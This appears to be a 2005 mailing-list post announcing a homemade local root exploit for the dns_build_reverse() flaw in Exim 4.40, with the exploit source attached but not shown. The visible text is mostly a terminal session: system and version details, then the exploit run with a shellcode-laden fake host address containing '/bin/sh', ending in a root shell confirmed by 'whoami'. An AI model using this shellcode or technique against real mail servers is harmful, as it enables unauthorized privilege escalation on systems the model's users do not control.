hello punters, i was bored last night so I coded up a local exploit of the dns_build_reverse() vulnerability in exim 4.40. hope noone minds as it was disclosed 5 months ago. tested on exim 4.40 default build with runtime user as root rather than exim or mail - hence the rootshell. see below for versions and system details. "exploit" attached. regards plug ============ the details ============ plug@bug:~$ uname -a Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686 GNU/Linux plug@bug:~$ /usr/exim/bin/exim -bV Exim version 4.40 #1 built 23-May-2005 22:31:34 Copyright (c) University of Cambridge 2004 Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52: (December 3, 2003) Support for: iconv() Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm dbmnz Authenticators: Routers: accept dnslookup ipliteral manualroute queryprogram redirect Transports: appendfile autoreply pipe smtp Fixed never_users: 0 Configuration file is /usr/exim/configure plug@bug:~$ plug@bug:~$ plug@bug:~$ ./exim-exploit Firing up exim - cross your fingers for shell! **** SMTP testing session as if from host ::%A:::::::::::::::::1ÀFF V ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿ **** but without any ident (RFC 1413) callback. ó **** This is not for real! >>> host in host_lookup? yes (matched "*") >>> looking up host name for ::%A:::::::::::::::::1ÀFF V ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿ >>> IP address lookup using gethostbyaddr() ó >>> IP address lookup failed: h_errno=1 LOG: no host name found for IP address ::%A:::::::::::::::::1ÀFF V ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿ sh-2.05b# ó sh-2.05b# sh-2.05b# sh-2.05b# whoami root sh-2.05b# sh-2.05b# exit exit plug@bug:~$
Attachment:
exim-exploit.c
Description: Binary data